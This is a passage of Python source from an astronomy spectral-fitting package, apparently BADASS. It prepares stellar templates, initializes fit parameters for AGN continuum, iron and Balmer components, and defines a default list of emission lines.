return lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask_good,binnum,spaxelx,spaxely
##################################################################################
# Alias function
prepare_ifu_plot = prepare_sdss_plot
#### Prepare stellar templates ###################################################
def prepare_stellar_templates(galaxy, lam_gal, fit_reg, velscale, fwhm_gal,fit_mask, losvd_options, run_dir):
"""
Prepares stellar templates for convolution using pPXF.
This example is from Capellari's pPXF examples, the code
for which can be found here: https://www-astro.physics.ox.ac.uk/~mxc/.
"""
# Stellar template directory
if (losvd_options["library"]=="IndoUS"):
temp_dir = "badass_data_files/IndoUS/"
fwhm_temp = 1.35 # Indo-US Template Library FWHM in Å (linear)
if (losvd_options["library"]=="Vazdekis2010"):
temp_dir = "badass_data_files/Vazdekis2010/"
fwhm_temp = 2.51 # Vazdekis+10 spectra have a constant resolution FWHM of 2.51A (linear)
if (losvd_options["library"]=="eMILES"):
temp_dir = "badass_data_files/eMILES/"
fwhm_temp = 2.51 # eMILES spectra have a constant resolution FWHM of 2.51A (linear)
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
#
# Get a list of templates stored in temp_dir. We only include 50 stellar
# templates of various spectral type from the Indo-US Coude Feed Library of
# Stellar templates (https://www.noao.edu/cflib/). We choose this library
# because it is (1) empirical, (2) has a broad wavelength range with
# minimal number of gaps, and (3) is at a sufficiently high resolution (~1.35 Å)
# such that we can probe as high a redshift as possible with the SDSS. It may
# be advantageous to use a different stellar template library (such as the MILES
# library) depdending on the science goals. BADASS only uses pPXF to measure stellar
# kinematics (i.e, stellar velocity and dispersion), and does NOT compute stellar
# population ages.
temp_list = natsort.natsorted(glob.glob(temp_dir + '/*.fits') )#
# Extract the wavelength range and logarithmically rebin one spectrum
# to the same velocity scale of the input galaxy spectrum, to determine
# the size needed for the array which will contain the template spectra.
#
hdu = fits.open(temp_list[0])
ssp = hdu[0].data
h2 = hdu[0].header
hdu.close()
lam_temp = np.array(h2['CRVAL1'] + h2['CDELT1']*np.arange(h2['NAXIS1']))
# By cropping the templates we save some fitting time
mask_temp = ( (lam_temp > (fit_min-100.)) & (lam_temp < (fit_max+100.)) )
ssp = ssp[mask_temp]
lam_temp = lam_temp[mask_temp]
lamRange_temp = [np.min(lam_temp), np.max(lam_temp)]
sspNew = log_rebin(lamRange_temp, ssp, velscale=velscale)[0]
templates = np.empty((sspNew.size, len(temp_list)))
# Interpolates the galaxy spectral resolution at the location of every pixel
# of the templates. Outside the range of the galaxy spectrum the resolution
# will be extrapolated, but this is irrelevant as those pixels cannot be
# used in the fit anyway.
if isinstance(fwhm_gal,(list,np.ndarray)):
fwhm_gal_interp = np.interp(lam_temp, lam_gal, fwhm_gal)
elif isinstance(fwhm_gal,(int,float)):
fwhm_gal_interp = np.full_like(lam_temp,fwhm_gal)
# Convolve the whole Vazdekis library of spectral templates
# with the quadratic difference between the SDSS and the
# Vazdekis instrumental resolution. Logarithmically rebin
# and store each template as a column in the array TEMPLATES.
# Quadratic sigma difference in pixels Vazdekis --> SDSS
# The formula below is rigorously valid if the shapes of the
# instrumental spectral profiles are well approximated by Gaussians.
#
# In the line below, the fwhm_dif is set to zero when fwhm_gal < fwhm_tem.
# In principle it should never happen and a higher resolution template should be used.
#
fwhm_dif = np.sqrt((fwhm_gal_interp**2 - fwhm_temp**2).clip(0))
sigma = fwhm_dif/2.355/h2['CDELT1'] # Sigma difference in pixels
for j, fname in enumerate(temp_list):
hdu = fits.open(fname)
ssp = hdu[0].data
ssp = ssp[mask_temp]
ssp = gaussian_filter1d(ssp, sigma) # perform convolution with variable sigma
sspNew,loglam_temp,velscale_temp = log_rebin(lamRange_temp, ssp, velscale=velscale)#[0]
templates[:, j] = sspNew/np.median(sspNew) # Normalizes templates
hdu.close()
# The galaxy and the template spectra do not have the same starting wavelength.
# For this reason an extra velocity shift DV has to be applied to the template
# to fit the galaxy spectrum. We remove this artificial shift by using the
# keyword VSYST in the call to PPXF below, so that all velocities are
# measured with respect to DV. This assume the redshift is negligible.
# In the case of a high-redshift galaxy one should de-redshift its
# wavelength to the rest frame before using the line below (see above).
#
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_temp[0]/lam_gal[0])*c # km/s
npix = galaxy.shape[0] # number of output pixels
ntemp = np.shape(templates)[1]# number of templates
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
temp_fft,npad = template_rfft(templates) # we will use this throughout the code
# If vel_const AND disp_const are True, there is no need to convolve during the
# fit, so we perform the convolution here and pass the convolved templates to fit_model.
if (losvd_options["vel_const"]["bool"]==True) & (losvd_options["disp_const"]["bool"]==True):
stel_vel = losvd_options["vel_const"]["val"]
stel_disp = losvd_options["disp_const"]["val"]
conv_temp = convolve_gauss_hermite(temp_fft,npad,float(velscale),\
[stel_vel, stel_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
stel_templates = conv_temp
# If vel_const OR disp_const is False, do not perform the convolution.
# Package the stellar templates, vsyst, and npad (everything needed for convolution)
# into a tuple called stel_templates, to be used in fit_model()
elif (losvd_options["vel_const"]["bool"]==False) | (losvd_options["disp_const"]["bool"]==False):
stel_templates = (temp_fft, npad, vsyst)
##############################################################################
return stel_templates
##################################################################################
#### Initialize Parameters #######################################################
def initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask_good,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat="RCHI2",
fit_opt_feii=True,fit_uv_iron=True,fit_balmer=True,
fit_losvd=False,fit_host=True,fit_power=True,fit_poly=False,
fit_narrow=True,fit_broad=True,fit_outflow=True,fit_absorp=True,
tie_line_fwhm=False,tie_line_voff=False,remove_lines=False,verbose=True):
"""
Initializes all free parameters for the fit based on user input and options.
"""
# Issue warnings for dumb options
if ((fit_narrow==False) & (fit_outflow==True)): # why would you fit outflow without narrow lines?
raise ValueError('\n Why would you fit outflows without narrow lines? Turn on narrow line component! \n')
################################################################################
# Initial conditions for some parameters
max_flux = np.nanmax(galaxy)
median_flux = np.nanmedian(galaxy)
# Padding on the edges; any line(s) within this many angstroms is omitted
# from the fit so problems do not occur with the fit
edge_pad = 10.0
def get_init_amp(line_center):
line_center = float(line_center)
try:
return (np.max(galaxy[(lam_gal>line_center-10.) & (lam_gal<line_center+10.)]))
except ValueError:
return 0.0
################################################################################
par_input = {} # initialize an empty dictionary to store free parameter dicts
#### Stellar component/Host Galaxy #############################################
# # Fit statistic: add noise_unexp if fit_stat = "RCHI2"
if (fit_stat=="RCHI2"):
if verbose:
print(' - Adding parameter for unexplained noise to fit reduced Chi-squared.')
par_input["NOISE_SCALE"] = ({'init':1.0,
'plim':(0.0001,10.0),
})
# Galaxy template amplitude
if (fit_host==True):
if verbose:
print(' - Fitting a SSP host-galaxy template.')
#
if len(host_options["age"])==1:
par_input['HOST_TEMP_AMP'] = ({'init':0.5*median_flux,
'plim':(0,max_flux),
})
#
if host_options["vel_const"]["bool"]==False:
#
par_input['HOST_TEMP_VEL'] = ({'init':0.0,
'plim':(-500.0,500),
})
#
if host_options["disp_const"]["bool"]==False:
#
par_input['HOST_TEMP_DISP'] = ({'init':100.0,
'plim':(0.001,500.0),
})
# Stellar LOSVD parameters (if fit_LOSVD = True)
if (fit_losvd==True):
if verbose:
print(' - Fitting the stellar LOSVD.')
# Stellar velocity
if losvd_options["vel_const"]["bool"]==False:
#
par_input['STEL_VEL'] = ({'init':100. ,
'plim':(-500.,500.),
})
# Stellar velocity dispersion
if losvd_options["disp_const"]["bool"]==False:
#
par_input['STEL_DISP'] = ({'init':150.0,
'plim':(0.001,500.),
})
##############################################################################
if (fit_poly==True):
if (poly_options["ppoly"]["bool"]==True) & (poly_options["ppoly"]["order"]>=0) :
if verbose:
print(' - Fitting polynomial continuum component.')
#
for n in range(int(poly_options['ppoly']['order'])+1):
par_input["PPOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
if (poly_options["apoly"]["bool"]==True) & (poly_options["apoly"]["order"]>=0):
if verbose:
print(' - Fitting additive legendre polynomial component.')
#
for n in range(int(poly_options['apoly']['order'])+1):
par_input["APOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
if (poly_options["mpoly"]["bool"]==True) & (poly_options["mpoly"]["order"]>=0):
if verbose:
print(' - Fitting multiplicative legendre polynomial component.')
#
for n in range(int(poly_options['mpoly']['order'])+1):
par_input["MPOLY_COEFF_%d" % n] = ({'init' :0.0,
'plim' :(-1.0e4,1.0e4),
})
##############################################################################
#### Simple Power-Law (AGN continuum) ########################################
if (fit_power==True) & (power_options['type']=='simple'):
if verbose:
print(' - Fitting Simple AGN power-law continuum.')
# AGN simple power-law amplitude
par_input['POWER_AMP'] = ({'init':(0.5*median_flux),
'plim':(0,max_flux),
})
# AGN simple power-law slope
par_input['POWER_SLOPE'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
#### Smoothly-Broken Power-Law (AGN continuum) ###############################
if (fit_power==True) & (power_options['type']=='broken'):
if verbose:
print(' - Fitting Smoothly-Broken AGN power-law continuum.')
# AGN simple power-law amplitude
par_input['POWER_AMP'] = ({'init':(0.5*median_flux),
'plim':(0,max_flux),
})
# AGN simple power-law break wavelength
par_input['POWER_BREAK'] = ({'init':(np.max(lam_gal) - (0.5*(np.max(lam_gal)-np.min(lam_gal)))),
'plim':(np.min(lam_gal), np.max(lam_gal)),
})
# AGN simple power-law slope 1 (blue side)
par_input['POWER_SLOPE_1'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
# AGN simple power-law slope 2 (red side)
par_input['POWER_SLOPE_2'] = ({'init':-1.0 ,
'plim':(-6.0,6.0),
})
# Power-law curvature parameter (Delta)
par_input['POWER_CURVATURE'] = ({'init':0.10,
'plim':(0.01,1.0),
})
##############################################################################
#### Optical FeII Templates ##################################################
if (fit_opt_feii==True) & (opt_feii_options['opt_template']['type']=='VC04'):
# Veron-Cerry et al. 2004 2-8 Parameter FeII template
if verbose:
print(' - Fitting broad and narrow optical FeII using Veron-Cetty et al. (2004) optical FeII templates')
if (opt_feii_options['opt_amp_const']['bool']==False):
if verbose:
print(' * varying optical FeII amplitudes')
# Narrow FeII amplitude
par_input['NA_OPT_FEII_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
# Broad FeII amplitude
par_input['BR_OPT_FEII_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (opt_feii_options['opt_fwhm_const']['bool']==False):
if verbose:
print(' * varying optical FeII fwhm')
# Narrow FeII FWHM
par_input['NA_OPT_FEII_FWHM'] = ({'init' :500.0,
'plim' :(100.0,1000.0),
})
# Broad FeII FWHM
par_input['BR_OPT_FEII_FWHM'] = ({'init' :3000.0,
'plim' :(1000.0,10000.0),
})
if (opt_feii_options['opt_voff_const']['bool']==False):
if verbose:
print(' * varying optical FeII voff')
# Narrow FeII VOFF
par_input['NA_OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-1000.0,1000.0),
})
# Broad FeII VOFF
par_input['BR_OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
elif (fit_opt_feii==True) & (opt_feii_options['opt_template']['type']=='K10'):
if verbose:
print(' - Fitting optical FeII template from Kovacevic et al. (2010)')
# Kovacevic et al. 2010 7-parameter FeII template (for NLS1s and BAL QSOs)
# Consits of 7 free parameters
# - 4 amplitude parameters for S,F,G,IZw1 line families
# - 1 Temperature parameter determines relative intensities (5k-15k Kelvin)
# - 1 FWHM parameter
# - 1 VOFF parameter
# - all lines modeled as Gaussians
# Narrow FeII amplitude
if (opt_feii_options['opt_amp_const']['bool']==False):
par_input['OPT_FEII_F_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_S_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_G_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
par_input['OPT_FEII_Z_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (opt_feii_options['opt_fwhm_const']['bool']==False):
# FeII FWHM
par_input['OPT_FEII_FWHM'] = ({'init' :1000.0,
'plim' :(100.0,5000.0),
})
if (opt_feii_options['opt_voff_const']['bool']==False):
# Narrow FeII amplitude
par_input['OPT_FEII_VOFF'] = ({'init' :0.0,
'plim' :(-1000.0,1000.0),
})
if (opt_feii_options['opt_temp_const']['bool']==False):
par_input['OPT_FEII_TEMP'] = ({'init' :10000.0,
'plim' :(2000.0,25000.0),
})
##############################################################################
#### UV Iron Template ########################################################
if (fit_uv_iron==True):
# Veron-Cerry et al. 2004 2-8 Parameter FeII template
if verbose:
print(' - Fitting UV iron emission using Vestergaard & Wilkes (2001) UV iron template')
if (uv_iron_options['uv_amp_const']['bool']==False):
if verbose:
print(' * varying UV iron amplitudes')
# Narrow FeII amplitude
par_input['UV_IRON_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (uv_iron_options['uv_fwhm_const']['bool']==False):
if verbose:
print(' * varying UV iron fwhm')
# Narrow FeII FWHM
par_input['UV_IRON_FWHM'] = ({'init' :3000.0,
'plim' :(1000.0,20000.0),
})
if (uv_iron_options['uv_voff_const']['bool']==False):
if verbose:
print(' * varying UV iron voff')
# Narrow FeII VOFF
par_input['UV_IRON_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
##############################################################################
#### Balmer Continuum ########################################################
if (fit_balmer==True):
# Balmer continuum following Kovacevic et al. (2014) and Calderone et al. (2017; QSFit)
if verbose:
print(' - Fitting Balmer Continuum')
if (balmer_options['R_const']['bool']==False):
if verbose:
print(' * varying Balmer ratio')
# Balmer continuum ratio
par_input['BALMER_RATIO'] = ({'init' :10.0,
'plim' :(0.0,100.0),
})
if (balmer_options['balmer_amp_const']['bool']==False):
if verbose:
print(' * varying Balmer amplitude')
# Balmer continuum amplitude
par_input['BALMER_AMP'] = ({'init' :0.1*median_flux,
'plim' :(0,max_flux),
})
if (balmer_options['balmer_fwhm_const']['bool']==False):
if verbose:
print(' * varying Balmer fwhm')
# Balmer continuum FWHM
par_input['BALMER_FWHM'] = ({'init' :5000.0,
'plim' :(1000.0,25000.0),
})
if (balmer_options['balmer_voff_const']['bool']==False):
if verbose:
print(' * varying Balmer voff')
# Balmer continuum VOFF
par_input['BALMER_VOFF'] = ({'init' :0.0,
'plim' :(-2000.0,2000.0),
})
if (balmer_options['Teff_const']['bool']==False):
if verbose:
print(' * varying Balmer effective temperature')
# Balmer continuum effective temperature
par_input['BALMER_TEFF'] = ({'init' :15000.0,
'plim' :(1000.0,50000.0),
})
if (balmer_options['tau_const']['bool']==False):
if verbose:
print(' * varying Balmer optical depth')
# Balmer continuum optical depth
par_input['BALMER_TAU'] = ({'init' :1.0,
'plim' :(0,1.0),
})
#### Emission Lines ##########################################################
#
if (user_lines is None) or (len(user_lines)==0):
line_list = line_list_default()
elif user_lines is not None:
line_list = user_lines
# Remove lines
if remove_lines:
# if len(remove_lines)==1:
# line_list.pop(remove_lines,None)
# elif len(remove_lines)>1:
for l in remove_lines:
line_list.pop(l,None)
# Check line component options for
line_list = check_line_comp_options(lam_gal,line_list,comp_options,edge_pad=edge_pad,verbose=verbose)
# Add the FWHM resolution and central pixel locations for each line so we don't have to
# find them during the fit.
line_list = add_fwhm_res(line_list,lam_gal,fwhm_gal,velscale,verbose=verbose)
# Generate line free parameters based on input line_list
line_par_input = initialize_line_pars(lam_gal,galaxy,comp_options,line_list,verbose=verbose)
# Check hard line constraints; returns updated line_list and line_par_input
line_list, line_par_input = check_hard_cons(lam_gal,galaxy,comp_options,line_list,line_par_input,par_input,verbose=verbose)
# Append line_par_input to par_input
par_input = {**par_input, **line_par_input}
##############################################################################
# Create combined_line_list
# A list of combined lines, and some relevant information
if combined_lines is not None:
combined_line_list = generate_comb_line_list(combined_lines,line_list)
elif (combined_lines is None) or (len(combined_lines)==0):
combined_line_list = generate_comb_line_list({},line_list)
##############################################################################
# Check soft-constraints
# Default soft constraints
# Soft constraints: If you want to vary a free parameter relative to another free parameter (such as
# requiring that broad lines have larger widths than narrow lines), these are called "soft" constraints,
# or "inequality" constraints.
# These are passed through a separate list of tuples which are used by the maximum likelihood constraints
# and prior constraints by emcee. Soft constraints have a very specific format following
# the scipy optimize SLSQP syntax:
#
# (parameter1 - parameter2) >= 0.0 OR (parameter1 >= parameter2)
#
if user_constraints is not None:
soft_cons = user_constraints
if (user_constraints is None) or (len(user_constraints)==0):
soft_cons = [
("BR_H_BETA_FWHM","NA_OIII_5007_FWHM"),
("BR_H_BETA_FWHM","OUT_OIII_5007_FWHM"),
#
("OUT_OIII_5007_FWHM","NA_OIII_5007_FWHM"),
#
("NA_OIII_5007_AMP","NA_H_BETA_AMP"),
("NA_OIII_5007_AMP","OUT_OIII_5007_AMP"),
#
("BR_PA_DELTA_AMP","BR_PA_EPSIL_AMP"),
("BR_PA_GAMMA_AMP","BR_PA_DELTA_AMP"),
# ("",""),
]
# Append any user constraints
# for u in user_constraints:
# soft_cons.append(tuple(u))
soft_cons = check_soft_cons(soft_cons,par_input,verbose=verbose)
return par_input, line_list, combined_line_list, soft_cons
##################################################################################
#### Line List ###################################################################
def generate_comb_line_list(combined_lines,line_list):
#
combined_line_list={}
valid_lines = [i for i in line_list]
for comb_line in combined_lines:
# Check to make sure lines are in line list
if np.all([True if i in valid_lines else False for i in combined_lines[comb_line] ]):
all_line_profiles = [line_list[i]["line_profile"] for i in combined_lines[comb_line] ]
if ("V" in all_line_profiles) or ("L" in all_line_profiles):
line_profile = "V"
else:
line_profile = "G"
combined_line_list[comb_line] = {"lines":combined_lines[comb_line],
"center":line_list[combined_lines[comb_line][0]]["center"],
"center_pix":line_list[combined_lines[comb_line][0]]["center_pix"],
"fwhm_res_kms":line_list[combined_lines[comb_line][0]]["fwhm_res_kms"],
"line_profile":line_profile,
}
#
return combined_line_list
def line_list_default():
"""
Below we define the "default" emission lines in BADASS.
The easiest way to disable any particular line is to simply comment out the line of interest.
There are five types of line: Narrow, Broad, Outflow, Absorption, and User. The Narrow, Broad,
Outflow, and Absorption lines are built into BADASS, whereas the User lines are added on the
front-end Jupyter interface.
Hard constraints: if you want to hold a parameter value to a constant scalar value, or to the
value of another parameter, this is called a "hard" constraint, because the parameter is no
longer free, help to a specific value. To implement a hard constraint, BADASS parses string
input from the amp, fwhm, voff, h3, h4, and shape keywords for each line. Be warned, however,
to tie a parameter to another paramter, requires you to know the name of the parameter in question.
If BADASS encounters an error in parsing hard constraint string input, it will automatically convert
the paramter to a "free" parameter instead of raising an error.
"""
# Default narrow lines
narrow_lines ={
### Region 8 (< 2000 Å)
"NA_LY_ALPHA" :{"center":1215.240, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
"NA_CIV_1549" :{"center":1549.480, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
"NA_CIII_1908" :{"center":1908.734, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na"},
##############################################################################################################################################################################################################################################
### Region 7 (2000 Å - 3500 Å)
"NA_MGII_2799" :{"center":2799.117, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"Mg II"},
"NA_HEII_3203" :{"center":3203.100, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He II"},
"NA_NEV_3346" :{"center":3346.783, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ne V]"},
"NA_NEV_3426" :{"center":3426.863, "amp":"free", "fwhm":"NA_NEV_3346_FWHM" , "voff":"NA_NEV_3346_VOFF", "line_type":"na","label":r"[Ne V]"},
##############################################################################################################################################################################################################################################
### Region 6 (3500 Å - 4400 Å):
"NA_OII_3727" :{"center":3727.092, "amp":"free", "fwhm":"NA_OII_3729_FWHM" , "voff":"NA_OII_3729_VOFF" , "line_type":"na","label":r"[O II]"},
"NA_OII_3729" :{"center":3729.875, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na"},
"NA_NEIII_3869":{"center":3869.857, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ne III]"}, # Coronal Line
"NA_HEI_3889" :{"center":3888.647, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_NEIII_3968":{"center":3968.593, "amp":"free", "fwhm":"NA_NEIII_3869_FWHM" , "voff":"NA_NEIII_3869_VOFF", "line_type":"na","label":r"[Ne III]"}, # Coronal Line
"NA_H_DELTA" :{"center":4102.900, "amp":"free", "fwhm":"NA_H_GAMMA_FWHM" , "voff":"NA_H_GAMMA_VOFF" , "line_type":"na","label":r"H$\delta$"},
"NA_H_GAMMA" :{"center":4341.691, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"H$\gamma$"},
"NA_OIII_4364" :{"center":4364.436, "amp":"free", "fwhm":"NA_H_GAMMA_FWHM" , "voff":"NA_H_GAMMA_VOFF" , "line_type":"na","label":r"[O III]"},
##############################################################################################################################################################################################################################################
### Region 5 (4400 Å - 5500 Å)
# "NA_HEI_4471" :{"center":4471.479, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na","label":r"He I"},
# "NA_HEII_4687" :{"center":4687.021, "amp":"free", "fwhm":"free", "voff":"free", "line_type":"na","label":r"He II"},
"NA_H_BETA" :{"center":4862.691, "amp":"free" , "fwhm":"NA_OIII_5007_FWHM", "voff":"free" , "line_type":"na" ,"label":r"H$\beta$"},
"NA_OIII_4960" :{"center":4960.295, "amp":"(NA_OIII_5007_AMP/2.98)", "fwhm":"NA_OIII_5007_FWHM", "voff":"NA_OIII_5007_VOFF", "line_type":"na" ,"label":r"[O III]"},
"NA_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na" ,"label":r"[O III]"},
# "NA_H_BETA" :{"center":4862.691, "amp":"free" , "fwhm":"STEL_DISP*2.355", "voff":"free" , "line_type":"na" ,"label":r"H$\beta$"},
# "NA_OIII_4960" :{"center":4960.295, "amp":"(NA_OIII_5007_AMP/2.98)", "fwhm":"STEL_DISP*2.355", "voff":"NA_OIII_5007_VOFF" , "line_type":"na" ,"label":r"[O III]"},
# "NA_OIII_5007" :{"center":5008.240, "amp":"free" , "fwhm":"STEL_DISP*2.355", "voff":"free" , "line_type":"na" ,"label":r"[O III]"},
##############################################################################################################################################################################################################################################
### Region 4 (5500 Å - 6200 Å)
"NA_FEVI_5638" :{"center":5637.600, "amp":"free", "fwhm":"NA_FEVI_5677_FWHM" , "voff":"NA_FEVI_5677_VOFF" , "line_type":"na","label":r"[Fe VI]"}, # Coronal Line
"NA_FEVI_5677" :{"center":5677.000, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe VI]"}, # Coronal Line
"NA_FEVII_5720":{"center":5720.700, "amp":"free", "fwhm":"NA_FEVII_6087_FWHM", "voff":"NA_FEVII_6087_VOFF", "line_type":"na","label":r"[Fe VII]"}, # Coronal Line
"NA_HEI_5876" :{"center":5875.624, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_FEVII_6087":{"center":6087.000, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe VII]"}, # Coronal Line
##############################################################################################################################################################################################################################################
### Region 3 (6200 Å - 6800 Å)
"NA_OI_6302" :{"center":6302.046, "amp":"free" , "fwhm":"NA_NII_6585_FWHM" , "voff":"NA_NII_6585_VOFF" , "line_type":"na","label":r"[O I]"},
"NA_SIII_6312" :{"center":6312.060, "amp":"free" , "fwhm":"NA_NII_6585_FWHM" , "voff":"free" , "line_type":"na","label":r"[S III]"},
"NA_OI_6365" :{"center":6365.535, "amp":"NA_OI_6302_AMP/3.0" , "fwhm":"NA_NII_6585_FWHM" , "voff":"NA_NII_6585_VOFF" , "line_type":"na","label":r"[O I]"},
"NA_FEX_6374" :{"center":6374.510, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe X]"}, # Coronal Line
#
"NA_NII_6549" :{"center":6549.859, "amp":"NA_NII_6585_AMP/2.93" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[N II]"},
# "NA_H_ALPHA" :{"center":6564.632, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"H$\alpha$"},
"NA_NII_6585" :{"center":6585.278, "amp":"free" , "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[N II]"},
"NA_SII_6718" :{"center":6718.294, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[S II]"},
"NA_SII_6732" :{"center":6732.668, "amp":"free" , "fwhm":"NA_NII_6585_FWHM", "voff":"NA_NII_6585_VOFF", "line_type":"na","label":r"[S II]"},
##############################################################################################################################################################################################################################################
### Region 2 (6800 Å - 8000 Å)
"NA_HEI_7062" :{"center":7065.196, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He I"},
"NA_ARIII_7135" :{"center":7135.790, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ar III]"},
"NA_OII_7319" :{"center":7319.990, "amp":"free", "fwhm":"NA_OII_7331_FWHM", "voff":"NA_OII_7331_VOFF", "line_type":"na","label":r"[O II]"},
"NA_OII_7331" :{"center":7330.730, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[O II]"},
"NA_NIIII_7890" :{"center":7889.900, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Ni III]"},
"NA_FEXI_7892" :{"center":7891.800, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe XI]"},
##############################################################################################################################################################################################################################################
### Region 1 (8000 Å - 9000 Å)
"NA_HEII_8236" :{"center":8236.790, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"He II"},
"NA_OI_8446" :{"center":8446.359, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"O I"},
"NA_FEII_8616" :{"center":8616.950, "amp":"free", "fwhm":"NA_FEII_8891_FWHM", "voff":"NA_FEII_8891_VOFF", "line_type":"na","label":r"[Fe II]"},
"NA_FEII_8891" :{"center":8891.910, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na","label":r"[Fe II]"},
##############################################################################################################################################################################################################################################
### Region Y (9000 Å - 12000 Å)
"NA_SIII_9069" :{"center":9068.600 , "amp":"free", "fwhm":"NA_SIII_9531_FWHM", "voff":"NA_SIII_9531_VOFF","h3":"NA_SIII_9531_H3", "h4":"NA_SIII_9531_H4", "line_type":"na", "line_profile":"GH", "label":r"[S III]"},
"NA_SIII_9531" :{"center":9531.100 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[S III]"},
"NA_CI_9824" :{"center":9824.130 , "amp":"free", "fwhm":"NA_CI_9850_FWHM" , "voff":"NA_CI_9850_VOFF" ,"h3":"NA_CI_9850_H3" , "h4":"NA_CI_9850_H4" , "line_type":"na", "line_profile":"GH", "label":r"[C I]"},
"NA_CI_9850" :{"center":9850.260 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[C I]"},
"NA_SVIII_9913" :{"center":9913.000 , "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "line_profile":"GH", "label":r"[S VIII]"},
# "NA_PA_EPSIL" :{"center":9548.587 , "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\epsilon$"},
# "NA_PA_DELTA" :{"center":10052.123, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"Pa$\delta$"},
"NA_HEI_10027" :{"center":10027.730, "amp":"free", "fwhm":"NA_HEI_10031_FWHM", "voff":"NA_HEI_10031_VOFF","h3":"NA_HEI_10031_H3", "h4":"NA_HEI_10031_H4", "line_type":"na", "label":r"He I"},
"NA_HEI_10031" :{"center":10031.160, "amp":"free", "fwhm":"free" , "voff":"free" ,"h3":"free" , "h4":"free" , "line_type":"na", "label":r"He I"},
"NA_FEVI_10111" :{"center":10111.671, "amp":"free", "fwhm":"free" , "voff":"free" , "line_type":"na", "label":r"[FeVI]"},
"NA_SII_10289" :{"center":10289.549, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10323" :{"center":10323.318, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10339" :{"center":10339.243, "amp":"free", "fwhm":"NA_SII_10373_FWHM", "voff":"NA_SII_10373_VOFF", "h3":"NA_SII_10373_H3", "h4":"NA_SII_10373_H4", "line_type":"na", "label":r"[SII]"},
"NA_SII_10373" :{"center":10373.332, "amp":"free", "fwhm":"free" , "voff":"free" , "h3":"free" , "h4":"free" , "line_type":"na", "label":r"[SII]"},
